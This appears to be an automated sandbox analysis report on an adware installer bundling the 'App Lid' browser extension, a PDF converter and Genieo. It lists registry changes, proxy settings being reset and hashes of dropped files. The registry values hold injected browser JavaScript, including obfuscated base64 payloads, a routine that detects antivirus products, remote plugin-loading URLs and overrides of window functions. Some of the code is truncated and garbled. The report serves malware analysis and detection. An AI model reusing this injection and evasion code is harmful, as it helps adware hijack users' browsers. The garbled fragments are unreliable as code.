"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTY3ZTdlNGExOTAwMTAwNzI3MTAwMTU2NGQ0ODUzMWMxMDAzMDI1ODQyNWIxNjQ2MDUxMjFjMWUwMzRjMGUxYjFhNDcxMDVhMTQxZjAyNWQ1YjQ2NDExYTE0MTI1NjRhMmQzZDJlMjYzODNiMjIyNjJkMzMzNzMwMzIzMTJmM2MzNDNhMjAzMjM2M2QzZTIxMzUzNzM4MzAzYjI4NTQ1NDVmNDIzOTA5MWMxMTU5MjgyZDIxM2YzYjI0M2IyMzNkMjAzMjIwM2QyYzI0MjczNzNmMzUyOTMyMmQzZDRiNDI0NTVlMDMxMTAyNDQ0ZjNkMzIzNzI1MjcyMjI3MzYzZTM2MjczZjJiMjIzYjM0MjYzYjNlMzYzZDMyNTI0MTVhNDcwNjAxMTE0MzVmNWI0NzQwNWE0NzEyNTM0NDQ1NTE1YTQ2NDE1MTQ3NDA1MjQyNDU1MDRiMDAwNDFiMTgxMDU5NDY1NDE2MDgxZDEzNTUyZTJiMjcyNTNkMzEzZTI2M2UyYzM0MjYzYjM2MjIzMjMyM2QzMzM3MmU1MjEwMDIxYjA2NTAyYjI4MmIyMzNiMzcyNDIwMmIyOTMxMjUzNzM4M2EzNzIzMzMyZTIxMzEyNTM3MjQyNzIxMjUyZDJiMjkyYjI4NGE1ZDdlNmQ1NTFhMTYxOTA0MDQzZDAzMTg0NjRkNTI0MDA1MDAwMzE4MDI0ZTRiNTgxMzRjMTkxMjBmMDEwMDVhMDcxODFmNGQwYzVhMDcwMDAxNGI1MjQ1NDQxMDA4MTI0NTU1MmUyYjI3MjUzZDMxM2UyNjNlMmMzNDI2M2IzMjJhMzYyODNhMzMyZDM1MmIzNzIyMzAzZDI0MzAyODM3NTc0MjU2NDEzYzAzMDAxMTRhMzcyZTM3MzYzODIxMzEzZjNkMzMyZDIzMmIyNTI3MjIzZDIzMzUzYTJkMmUyYjQyNDE0MDU0MWYxMTExNWI0YzJiM2I"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"ModeType" = "production"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\72]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/72.js"
[HKCU\Software\AppDataLow\Software\App Lid\Update]
"LastCheck" = "1422513845"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\42]
"Version" = "10"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"IsButtonEnabled" = "true"
"PublisherId" = "25286"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\91]
"Version" = "121"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\14]
"Version" = "11"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbacRÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\221]
"Version" = "4"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"AppName" = "App Lid-bg.exe"
[HKLM\SOFTWARE\Wow6432Node\App Lid\IE\Profiles]
"S-1-5-21-2858020935-2156992550-3658131804-1003" = "1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\28]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/28.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var z={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64玫Ŗ"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"CodeDownloadFbDomain" = "http://js.clientdemocloud.com"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"Policy" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){Å–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\72]
"Name" = "appApiValidation"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\13]
"Version" = "7"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\301]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTQ2ODU2NTg0YjU2NDgwNDFmMDAxZjM3MDQxNDQ5NGM0YTRlMDMwMDFiMTI0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWU1ZDE5NWEwYzBlMTkwZDBmMTAxODAzMDUwMDQxMGMxMzBjNDQxNzFhMWM0NDE4NDEwODA1NDcwODI3MmI1MTBkMTUwMzExMTM1ZTA4MTcwNzFjMGExZDA4MGMzZjFjNTYyOTM1MmYzOTNiM2MzMTI0MzEyZjMzMzgzMzI4MzUyMjMyMjkzMTJmMjkzNTRhMDgxYjFhMGMwMjBhMTIzNTA1MDgwZTQ5MzAzZDM1MmEyNDI1MzkzZTIyMzAyYTMwMjkzYjI0MjMyNDM4MzkyZDMwMjEzOTNjMmUyOTM1NGEwOTA2MDAxNTA1MWQxOTM1MDUwODBlNDkzMDNkMzUyYTI0MjUzOTNlMjIzMDJhMzAyOTNhMzkzOTNkM2YyZTI2MzAzZDUwMTkxYjA2MjMyODU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTIzMjgzNDJiNDkwMzA2MDgyNTE3MDcwOTU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTI0MmQyNjMxMzAzZDUwMzEyOTNmMjk1MTM0MmIyYzMwMzkyYjM4MjQyMzI4MmUyNjMwMmIzODJiM2YzNzI2MjAyZTI2MzAzNzI1M2QzOTI5MjMyODM0MmI0OTExMDMxYTIyMzI1NzMzMzQzNzNkMmQyNTJiMzkzZjJlMjkzOTJiMmEzYTIyM2QyNTMyMmYyODM0MjczYTIwMjkzMTJmMjkzNTRhMTk0OTMwM2QyNDM2MmYyOTM1NGU0NzdlNGY0MjU2NTg0OTFlMWUxODFiMDczYTEwMWE1YTUxNTY0ODA0MWYwMDFmMTE0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWUÇÂÂÅ–"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionTime" = "3E E0 8B ED 8E 3B D0 01"
[HKCU\Software\InstalledBrowserExtensions\Lid]
"65743" = "App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\22]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/22.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\46]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/46.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\37]
"Version" = "6"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\1]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/1.js"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"SetNewTab" = "false"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\354]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/354.js"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"DisplayVersion" = "1.36.01.22"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"EnableSearchIE" = "false"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\234]
"Name" = "firstoffer_right_slider_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\9]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/9.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\252]
"Name" = "nova_test_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\262]
"Version" = "2"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\38]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/38.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"
[HKLM\SOFTWARE\Wow6432Node\App Lid\IE]
"TotalProfiles" = "1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\177]
"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"RunInFrame" = "true"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\180]
"Version" = "12"
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmI"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\301]
"Name" = "guava_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\255]
"Version" = "4"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\3]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\183]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/183.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\255]
"Name" = "bpo_serp_somo_m"
[HKLM\SOFTWARE\InstalledBrowserExtensions\25286]
"65743" = "App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\195]
"Version" = "28"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"Params" = "{ source_id : 000820, sub_id : 0, uzid : appshatmadness"10?0>0>0?0:>
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following registry key(s):
[HKLM\SOFTWARE\Wow6432Node\Tempo]
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process F365.tmp:3556 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "1A 3B 37 04 8F 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4D 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"%IS_PREREQCMD%-MyPDFConverter" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F365.tmp"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "74 FE 43 07 8F 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"%IS_PREREQ%-MyPDFConverter"
"%IS_PREREQCMD%-MyPDFConverter"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"%IS_PREREQF%-MyPDFConverter"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
The Application disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
" ISSetupPrerequisistes"
The process firsttime_setup.exe:3488 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\genieo]
"NoModify" = "1"
"URLInfoAbout" = "http://www.genieo.com/contact-us/"
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe"
"EstimatedSize" = "28672"
"NoRepair" = "1"
"HelpLink" = "http://www.genieo.com/faq"
"Publisher" = "Genieo Innovation Ltd."
"DisplayVersion" = "1.0.400"
[HKCU\Software\Genieo\Components\FirstTime]
"UninstallURL" = "http://www.genieo.com/uninstall"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\genieo]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe"
"DisplayName" = "Genieo"
The process MSIEXEC.EXE:3852 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer]
"GlobalAssocChangedCounter" = "35"
[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
"LanguageList" = "en-US, en"
Dropped PE files
MD5 | File path |
---|---|
54c7c9516ee9225c04d7e807ebcac565 | c:\Program Files (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe |
c373d84f563ba4a541164d501b3a9a21 | c:\Program Files (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.exe |
7e9eb548a991849d1b87077ab4f65cee | c:\Program Files (x86)\App Lid\App Lid-bg.exe |
e0b472d12390ac79a68c33b6aeb10035 | c:\Program Files (x86)\App Lid\App Lid-bho.dll |
a958fb3ab34e335b5c32f104e413e4be | c:\Program Files (x86)\App Lid\App Lid-bho64.dll |
d1b974667c753c5e5c8596b64faaa14d | c:\Program Files (x86)\App Lid\App Lid-buttonutil.dll |
16a62235ff5abb857606688f9247f47f | c:\Program Files (x86)\App Lid\App Lid-buttonutil.exe |
908dd57732d0d18a431e848a774c80f2 | c:\Program Files (x86)\App Lid\App Lid-buttonutil64.dll |
de2be3d4b8d8a1c22a758693441c8b64 | c:\Program Files (x86)\App Lid\App Lid-buttonutil64.exe |
dcc00bbd6e1d67084a05c9afe3d27e48 | c:\Program Files (x86)\App Lid\App Lid-codedownloader.exe |
81a36f0ac2a7c00607da4cb2db464a0c | c:\Program Files (x86)\App Lid\Uninstall.exe |
ce937e28829377ba3c99d0b7c9369305 | c:\Program Files (x86)\App Lid\utils.exe |
140e9a22abd09f57f5ee0181ada1dabb | c:\Program Files (x86)\GPLGS\gsdll32.dll |
ae427b6cef5ba09ba3c72f8f3897a62e | c:\Program Files (x86)\GPLGS\gswin32c.exe |
173b1563476d5b22df7ef4c0cc57e58d | c:\Program Files (x86)\MyPDFConverter\CPWriter2.exe |
3e806636c4dc6727611a69e3418e260c | c:\Program Files (x86)\MyPDFConverter\Preferences.exe |
a265887de685d2f8dbde8036064c61df | c:\Program Files (x86)\MyPDFConverter\pdfwriter.exe |
173b1563476d5b22df7ef4c0cc57e58d | c:\Program Files (x86)\MyPDFConverter\setup\CPWriter2.exe |
033430ca935c3b3b40dd19da6ff1e35f | c:\Program Files (x86)\MyPDFConverter\setup\CUSTMON.DLL |
64cfbc94d91422a749f56d29f2c4bf89 | c:\Program Files (x86)\MyPDFConverter\setup\Converter.exe |
a8c4d265f14c4f977c399d51971041b6 | c:\Program Files (x86)\MyPDFConverter\setup\Driver\PS5UI.DLL |
28e60cef92843c1ea5c221ddc308b766 | c:\Program Files (x86)\MyPDFConverter\setup\Driver\PSCRIPT5.DLL |
28e9ec320646cc0779422f5f9dc9129a | c:\Program Files (x86)\MyPDFConverter\setup\Driver\PSMON.DLL |
1ede62e047f4bb3d0398eba367c16484 | c:\Program Files (x86)\MyPDFConverter\setup\Driver\X64\PS5UI.DLL |
fb270d281f4929b9e0894afc816c9dbe | c:\Program Files (x86)\MyPDFConverter\setup\Driver\X64\PSCRIPT5.DLL |
3e806636c4dc6727611a69e3418e260c | c:\Program Files (x86)\MyPDFConverter\setup\Preferences.exe |
2417cecfd619a7007a638dc665fcc4fe | c:\Program Files (x86)\MyPDFConverter\setup\Setup.exe |
7ee1622a8c253689140658670853498b | c:\Program Files (x86)\MyPDFConverter\setup\custmon32.dll |
